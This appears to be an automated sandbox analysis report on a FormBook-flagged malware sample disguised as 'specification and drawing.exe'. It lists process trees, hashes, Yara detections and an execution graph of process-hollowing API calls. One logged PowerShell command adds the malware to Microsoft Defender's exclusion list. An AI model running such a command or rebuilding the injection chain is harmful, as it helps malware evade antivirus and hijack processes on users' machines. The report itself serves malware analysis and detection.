                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x2a0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\specification and drawing.exe"
                                                                                                        Imagebase:0x550000
                                                                                                        File size:917'504 bytes
                                                                                                        MD5 hash:8941CBF2CDD44ECFE97F45A2FED0D94F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:08:36:42
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:08:36:57
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe"
                                                                                                        Imagebase:0x5b0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:8
                                                                                                        Start time:08:36:59
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\wscript.exe"
                                                                                                        Imagebase:0xc60000
                                                                                                        File size:147'456 bytes
                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:10
                                                                                                        Start time:08:37:13
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe"
                                                                                                        Imagebase:0x5b0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:12
                                                                                                        Start time:08:37:26
                                                                                                        Start date:02/12/2024
                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                        Imagebase:0x7ff728280000
                                                                                                        File size:676'768 bytes
                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:11.3%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:2%
                                                                                                          Total number of Nodes:304
                                                                                                          Total number of Limit Nodes:20
                                                                                                          execution_graph 36910 71da1ad 36911 71da008 36910->36911 36912 71da044 36911->36912 36916 71daf38 36911->36916 36932 71daff6 36911->36932 36949 71daf48 36911->36949 36917 71daf48 36916->36917 36928 71daf6a 36917->36928 36965 71db78a 36917->36965 36970 71db7a9 36917->36970 36975 71db38c 36917->36975 36980 71db56d 36917->36980 36984 71dba30 36917->36984 36989 71db757 36917->36989 36993 71db3b4 36917->36993 36999 71db6d5 36917->36999 37004 71db45a 36917->37004 37009 71db67b 36917->37009 37014 71dbadb 36917->37014 37019 71db6c2 36917->37019 37024 71db827 36917->37024 36928->36912 36933 71daff9 36932->36933 36934 71daf84 36932->36934 36933->36912 36935 71dbadb 2 API calls 36934->36935 36936 71db67b 2 API calls 36934->36936 36937 71db45a 2 API calls 36934->36937 36938 71db6d5 2 API calls 36934->36938 36939 71db3b4 2 API calls 36934->36939 36940 71db757 2 API calls 36934->36940 36941 71dba30 2 API calls 36934->36941 36942 71db56d 2 API calls 36934->36942 36943 71db38c 2 API calls 36934->36943 36944 71db7a9 2 API calls 36934->36944 36945 71daf6a 36934->36945 36946 71db78a 2 API calls 36934->36946 36947 71db827 2 API calls 36934->36947 36948 71db6c2 2 API calls 36934->36948 36935->36945 36936->36945 36937->36945 36938->36945 36939->36945 36940->36945 36941->36945 36942->36945 36943->36945 36944->36945 36945->36912 36946->36945 36947->36945 36948->36945 36950 71daf62 36949->36950 36951 71dbadb 2 API calls 36950->36951 36952 71db67b 2 API calls 36950->36952 36953 71db45a 2 API calls 36950->36953 36954 71db6d5 2 API calls 36950->36954 36955 71db3b4 2 API calls 36950->36955 36956 71db757 2 API calls 36950->36956 36957 71dba30 2 API calls 36950->36957 36958 71db56d 2 API calls 36950->36958 36959 71db38c 2 API calls 36950->36959 36960 71db7a9 2 API calls 36950->36960 36961 71daf6a 36950->36961 36962 71db78a 2 API calls 36950->36962 36963 71db827 2 API calls 36950->36963 36964 71db6c2 2 API calls 36950->36964 36951->36961 36952->36961 36953->36961 36954->36961 36955->36961 36956->36961 36957->36961 36958->36961 36959->36961 36960->36961 36961->36912 36962->36961 36963->36961 36964->36961 36966 71dbae2 36965->36966 37031 71d9a29 36966->37031 37035 71d9a30 36966->37035 36967 71dbb04 36971 71db6ec 36970->36971 36972 71db701 36970->36972 37039 71d92b9 36971->37039 37043 71d92c0 36971->37043 36972->36928 36976 71db399 36975->36976 37047 71d9bbc 36976->37047 37051 71d9bc8 36976->37051 37055 71d9368 36980->37055 37059 71d9370 36980->37059 36981 71db587 36981->36928 37063 71d9939 36984->37063 37067 71d9940 36984->37067 36985 71db450 36985->36984 36986 71db462 36985->36986 36986->36928 37071 71d9880 36989->37071 37075 71d9878 36989->37075 36990 71db775 36995 71db399 36993->36995 36994 71db425 36994->36928 36996 71dbf02 36995->36996 36997 71d9bbc CreateProcessA 36995->36997 36998 71d9bc8 CreateProcessA 36995->36998 36996->36928 36997->36994 36998->36994 37000 71db6db 36999->37000 37002 71d92b9 ResumeThread 37000->37002 37003 71d92c0 ResumeThread 37000->37003 37001 71db701 37001->36928 37002->37001 37003->37001 37005 71db450 37004->37005 37006 71db462 37005->37006 37007 71d9939 WriteProcessMemory 37005->37007 37008 71d9940 WriteProcessMemory 37005->37008 37006->36928 37007->37005 37008->37005 37010 71dbbd5 37009->37010 37012 71d9368 Wow64SetThreadContext 37010->37012 37013 71d9370 Wow64SetThreadContext 37010->37013 37011 71dbbf0 37012->37011 37013->37011 37015 71dbae1 37014->37015 37016 71dbb04 37015->37016 37017 71d9a29 ReadProcessMemory 37015->37017 37018 71d9a30 ReadProcessMemory 37015->37018 37017->37016 37018->37016 37020 71db6cf 37019->37020 37022 71d9939 WriteProcessMemory 37020->37022 37023 71d9940 WriteProcessMemory 37020->37023 37021 71db8e0 37021->36928 37022->37021 37023->37021 37027 71d9939 WriteProcessMemory 37024->37027 37028 71d9940 WriteProcessMemory 37024->37028 37025 71db450 37026 71db462 37025->37026 37029 71d9939 WriteProcessMemory 37025->37029 37030 71d9940 WriteProcessMemory 37025->37030 37026->36928 37027->37025 37028->37025 37029->37025 37030->37025 37032 71d9a30 ReadProcessMemory 37031->37032 37034 71d9abf 37032->37034 37034->36967 37036 71d9a7b ReadProcessMemory 37035->37036 37038 71d9abf 37036->37038 37038->36967 37040 71d92c0 ResumeThread 37039->37040 37042 71d9331 37040->37042 37042->36972 37044 71d9300 ResumeThread 37043->37044 37046 71d9331 37044->37046 37046->36972 37048 71d9c51 CreateProcessA 37047->37048 37050 71d9e13 37048->37050 37052 71d9c51 CreateProcessA 37051->37052 37054 71d9e13 37052->37054 37056 71d9370 Wow64SetThreadContext 37055->37056 37058 71d93fd 37056->37058 37058->36981 37060 71d93b5 Wow64SetThreadContext 37059->37060 37062 71d93fd 37060->37062 37062->36981 37064 71d9940 WriteProcessMemory 37063->37064 37066 71d99df 37064->37066 37066->36985 37068 71d9988 WriteProcessMemory 37067->37068 37070 71d99df 37068->37070 37070->36985 37072 71d98c0 VirtualAllocEx 37071->37072 37074 71d98fd 37072->37074 37074->36990 37076 71d9880 VirtualAllocEx 37075->37076 37078 71d98fd 37076->37078 37078->36990 36714 71dc888 36719 71d659c 36714->36719 36716 71dc8a1 36717 71dca2f 36716->36717 36723 71d64e8 36716->36723 36722 71d65a7 36719->36722 36720 71dca2f 36720->36716 36721 71d64e8 PostMessageW 36721->36720 36722->36720 36722->36721 36724 71dc400 PostMessageW 36723->36724 36725 71dc45f 36724->36725 36725->36717 36726 13ed7a8 DuplicateHandle 36727 13ed83e 36726->36727 36728 13e4668 36729 13e4684 36728->36729 36730 13e46a4 36729->36730 36734 13e4838 36729->36734 36739 13e43e8 36730->36739 36732 13e46c3 36735 13e485d 36734->36735 36743 13e4948 36735->36743 36747 13e4937 36735->36747 36740 13e43f3 36739->36740 36755 13e5a80 36740->36755 36742 13e7234 36742->36732 36745 13e496f 36743->36745 36744 13e4a4c 36745->36744 36751 13e4544 36745->36751 36749 13e4948 36747->36749 36748 13e4a4c 36748->36748 36749->36748 36750 13e4544 CreateActCtxA 36749->36750 36750->36748 36752 13e5dd8 CreateActCtxA 36751->36752 36754 13e5e9b 36752->36754 36756 13e5a8b 36755->36756 36759 13e5aa0 36756->36759 36758 13e73b5 36758->36742 36760 13e5aab 36759->36760 36763 13e5ad0 36760->36763 36762 13e749a 36762->36758 36764 13e5adb 36763->36764 36767 13e5b00 36764->36767 36766 13e758d 36766->36762 36768 13e5b0b 36767->36768 36770 13e8aeb 36768->36770 36773 13ead90 36768->36773 36769 13e8b29 36769->36766 36770->36769 36778 13ece80 36770->36778 36774 13ead95 36773->36774 36783 13eb1d0 36774->36783 36786 13eb1c1 36774->36786 36775 13eada6 36775->36770 36779 13eceb1 36778->36779 36780 13eced5 36779->36780 36795 13ed438 36779->36795 36799 13ed448 36779->36799 36780->36769 36790 13eb2b7 36783->36790 36784 13eb1df 36784->36775 36787 13eb1d0 36786->36787 36789 13eb2b7 GetModuleHandleW 36787->36789 36788 13eb1df 36788->36775 36789->36788 36791 13eb2fc 36790->36791 36792 13eb2d9 36790->36792 36791->36784 36792->36791 36793 13eb500 GetModuleHandleW 36792->36793 36794 13eb52d 36793->36794 36794->36784 36796 13ed448 36795->36796 36797 13ed48f 36796->36797 36803 13ed240 36796->36803 36797->36780 36800 13ed455 36799->36800 36801 13ed48f 36800->36801 36802 13ed240 GetModuleHandleW 36800->36802 36801->36780 36802->36801 36804 13ed24b 36803->36804 36806 13edda0 36804->36806 36807 13ed36c 36804->36807 36806->36806 36808 13ed377 36807->36808 36809 13e5b00 GetModuleHandleW 36808->36809 36810 13ede0f 36809->36810 36810->36806 36686 7c56c48 36687 7c56c82 36686->36687 36688 7c56d13 36687->36688 36689 7c56cfe 36687->36689 36691 7c541c4 3 API calls 36688->36691 36694 7c541c4 36689->36694 36693 7c56d22 36691->36693 36696 7c541cf 36694->36696 36695 7c56d09 36696->36695 36699 7c57657 36696->36699 36705 7c57668 36696->36705 36711 7c5420c 36699->36711 36701 7c5768f 36701->36695 36703 7c576b8 CreateIconFromResourceEx 36704 7c57736 36703->36704 36704->36695 36706 7c57682 36705->36706 36707 7c5420c CreateIconFromResourceEx 36705->36707 36708 7c5768f 36706->36708 36709 7c576b8 CreateIconFromResourceEx 36706->36709 36707->36706 36708->36695 36710 7c57736 36709->36710 36710->36695 36712 7c576b8 CreateIconFromResourceEx 36711->36712 36713 7c57682 36712->36713 36713->36701 36713->36703 36811 71dc180 36812 71dc30b 36811->36812 36813 71dc1a6 36811->36813 36813->36812 36814 71d64e8 PostMessageW 36813->36814 36814->36813 36815 7c51f18 36816 7c51f37 36815->36816 36819 7c51f40 36815->36819 36823 7c51f50 36815->36823 36820 7c51f59 36819->36820 36827 7c51f88 36820->36827 36821 7c51f7e 36821->36816 36824 7c51f59 36823->36824 36826 7c51f88 DrawTextExW 36824->36826 36825 7c51f7e 36825->36816 36826->36825 36828 7c51fc2 36827->36828 36829 7c51fd3 36827->36829 36828->36821 36830 7c52061 36829->36830 36833 7c522b0 36829->36833 36838 7c522c0 36829->36838 36830->36821 36834 7c522e8 36833->36834 36835 7c523ee 36834->36835 36843 7c554e1 36834->36843 36848 7c554f0 36834->36848 36835->36828 36839 7c522e8 36838->36839 36840 7c523ee 36839->36840 36841 7c554e1 DrawTextExW 36839->36841 36842 7c554f0 DrawTextExW 36839->36842 36840->36828 36841->36840 36842->36840 36844 7c55506 36843->36844 36853 7c55949 36844->36853 36858 7c55958 36844->36858 36845 7c5557c 36845->36835 36849 7c55506 36848->36849 36851 7c55949 DrawTextExW 36849->36851 36852 7c55958 DrawTextExW 36849->36852 36850 7c5557c 36850->36835 36851->36850 36852->36850 36854 7c55958 36853->36854 36862 7c55989 36854->36862 36867 7c55998 36854->36867 36855 7c55976 36855->36845 36860 7c55989 DrawTextExW 36858->36860 36861 7c55998 DrawTextExW 36858->36861 36859 7c55976 36859->36845 36860->36859 36861->36859 36863 7c55992 36862->36863 36864 7c559f6 36863->36864 36872 7c55a08 36863->36872 36877 7c55a18 36863->36877 36864->36855 36868 7c559b5 36867->36868 36869 7c559f6 36868->36869 36870 7c55a08 DrawTextExW 36868->36870 36871 7c55a18 DrawTextExW 36868->36871 36869->36855 36870->36869 36871->36869 36874 7c55a18 36872->36874 36873 7c55a4e 36873->36864 36874->36873 36882 7c54060 36874->36882 36876 7c55aa9 36879 7c55a1d 36877->36879 36878 7c55a4e 36878->36864 36879->36878 36880 7c54060 DrawTextExW 36879->36880 36881 7c55aa9 36880->36881 36884 7c5406b 36882->36884 36883 7c55e39 36883->36876 36884->36883 36888 7c567d0 36884->36888 36892 7c567e0 36884->36892 36885 7c55f4b 36885->36876 36889 7c567e0 36888->36889 36896 7c5419c 36889->36896 36893 7c567e5 36892->36893 36894 7c5419c DrawTextExW 36893->36894 36895 7c567fd 36894->36895 36895->36885 36897 7c56818 DrawTextExW 36896->36897 36899 7c567fd 36897->36899 36899->36885 36900 13ed560 36901 13ed5a6 GetCurrentProcess 36900->36901 36903 13ed5f8 GetCurrentThread 36901->36903 36904 13ed5f1 36901->36904 36905 13ed62e 36903->36905 36906 13ed635 GetCurrentProcess 36903->36906 36904->36903 36905->36906 36907 13ed66b 36906->36907 36908 13ed693 GetCurrentThreadId 36907->36908 36909 13ed6c4 36908->36909
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fc15907d410f983832f47f673d8d224be107dea8272fd88199507bd4d1867d86
                                                                                                          • Instruction ID: 452339ccd20796d9015310e573419e025bae8841de4e65ebd4bca68c0ba7322d
                                                                                                          • Opcode Fuzzy Hash: fc15907d410f983832f47f673d8d224be107dea8272fd88199507bd4d1867d86
                                                                                                          • Instruction Fuzzy Hash: 83327DB0E00215CFDB58DFA9C8947AEBBF2AFC4300F14856AD809AB395DB319D85CB55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c8003c96cfa4c345322b4603fa77dcde42e11eb0ec5839b758ae079b85460670
                                                                                                          • Instruction ID: 2c1e03175cb20a40b00a44de1f375b39fa1babdeceab00f03ac6430eb047a074
                                                                                                          • Opcode Fuzzy Hash: c8003c96cfa4c345322b4603fa77dcde42e11eb0ec5839b758ae079b85460670
                                                                                                          • Instruction Fuzzy Hash: 3BC15BB1E00255CFCF14CFA5C880B9ABBB2AF85310F14C5A9D809AB255EB31DAD5CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e583a2c9557d4784b11ee3b224d5f32dc718ce7b5ab13310adc561cbb4f9f744
                                                                                                          • Instruction ID: 72f6b4b9e870d547403b0c98c7b7ea6608eb51fd436d9fbb1841e9e6d5862b17
                                                                                                          • Opcode Fuzzy Hash: e583a2c9557d4784b11ee3b224d5f32dc718ce7b5ab13310adc561cbb4f9f744
                                                                                                          • Instruction Fuzzy Hash: 24C15CB1E00255CFCF14CFA5C88079ABBB2AF89310F14C5AAD809AB255EB31DAD5CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 91ffd75debd4150b7d34bfc52a16b72bd20a4982f2ccb2775bbc94bbc683ffa3
                                                                                                          • Instruction ID: 2c1e5d238f613099278ffecf97b74d722bdceb0246ecf2385eb4d0e47dddffa8
                                                                                                          • Opcode Fuzzy Hash: 91ffd75debd4150b7d34bfc52a16b72bd20a4982f2ccb2775bbc94bbc683ffa3
                                                                                                          • Instruction Fuzzy Hash: 5FA1F4B0D05228CFDB18CFA6D844BEEBBB6BF8A300F109169D809B7255DB754A85CF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 01af5800973f88139a6de6dc5d9c44d3b5fbc9cf475981f09e8a6631c2f2d77b
                                                                                                          • Instruction ID: e51e4a3b4cc23e599fd1c741d14cc8befbd0e2d851a78c8afb0fcec64a9a838d
                                                                                                          • Opcode Fuzzy Hash: 01af5800973f88139a6de6dc5d9c44d3b5fbc9cf475981f09e8a6631c2f2d77b
                                                                                                          • Instruction Fuzzy Hash: 00A1E7B4D05228CFDB18CFA6D8447EEBBB2BF4A300F10916AD809BB255DB754A85CF45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0c2e9f873270b0221f811e1ba294ede46624f1d610fa02bc8ce55507733db5bc
                                                                                                          • Instruction ID: 1feab86c63ce2c65b28d85c49e7948a61c83192ab42e08091fd4325858e8579c
                                                                                                          • Opcode Fuzzy Hash: 0c2e9f873270b0221f811e1ba294ede46624f1d610fa02bc8ce55507733db5bc
                                                                                                          • Instruction Fuzzy Hash: 5A81E075E002199FDB18DFA9C894AEEBBB2FF88310F50802AD909AB365DB755941CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6ead70ea6ca50f10e7e51272610ce608474d2dc4f9fb4bbe467587a49db327ed
                                                                                                          • Instruction ID: 9aba703e8144b9d1c824d1fd4f7df44c0a3ac63b094fb9bd73becc0dc3a62fce
                                                                                                          • Opcode Fuzzy Hash: 6ead70ea6ca50f10e7e51272610ce608474d2dc4f9fb4bbe467587a49db327ed
                                                                                                          • Instruction Fuzzy Hash: 2281BF74E002199FDB18DFE9C894AEEBBB2FF88310F50802AD909AB365DB755941CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e1c6a50d3180782b0b146b403df996df4196253c0e7ad876bf3bfed0e2727cdd
                                                                                                          • Instruction ID: d17ced0b1f03afdcff39a9aa66d4ec864b2c9b66a69825210670263ee984f5c4
                                                                                                          • Opcode Fuzzy Hash: e1c6a50d3180782b0b146b403df996df4196253c0e7ad876bf3bfed0e2727cdd
                                                                                                          • Instruction Fuzzy Hash: 2E21C3B1D146588BEB18CFABC9457DEFBF2AFC8300F14C16AD808A6264DB7409868F50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b91accb56956dde78c92685477d0fae70b0985b8aea215ece37fd20a4ba9b76
                                                                                                          • Instruction ID: 2e2f2669a3ca0ef8d9efc6d44d6e596fd2ecb6b483166644a2b1cf5d026bc9dd
                                                                                                          • Opcode Fuzzy Hash: 7b91accb56956dde78c92685477d0fae70b0985b8aea215ece37fd20a4ba9b76
                                                                                                          • Instruction Fuzzy Hash: B521B4B1D046588BEB18CF9BC9457DEFAF7AFC9300F14C06AD808B6264DB7409468F50

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED5DE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 013ED61B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED658
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 013ED6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 383f58887d16378552cf6664fdf77a423ce7b4b09e98396a507668d094555c04
                                                                                                          • Instruction ID: 2b8bd4695a189c71d7b6b543ef35a76fed1b5e6fb7043a3a47f032df6aa574f2
                                                                                                          • Opcode Fuzzy Hash: 383f58887d16378552cf6664fdf77a423ce7b4b09e98396a507668d094555c04
                                                                                                          • Instruction Fuzzy Hash: B15177B490034A8FDB14CFA9D548B9EBFF1BF88328F208459E419A73A0DB745984CF65

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED5DE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 013ED61B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 013ED658
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 013ED6B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 76f33f20fd019eb918cfb748f217e143c5e6653ace3aa851157bae2de5d80a17
                                                                                                          • Instruction ID: b5a63c7521a3c4ea7a26a4c0b775e01f073ddafc09a15605c7efc16cce84196c
                                                                                                          • Opcode Fuzzy Hash: 76f33f20fd019eb918cfb748f217e143c5e6653ace3aa851157bae2de5d80a17
                                                                                                          • Instruction Fuzzy Hash: F65156B490034A9FDB14CFA9D548B9EBFF1BF88318F208419E418A73A0DB745984CF65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
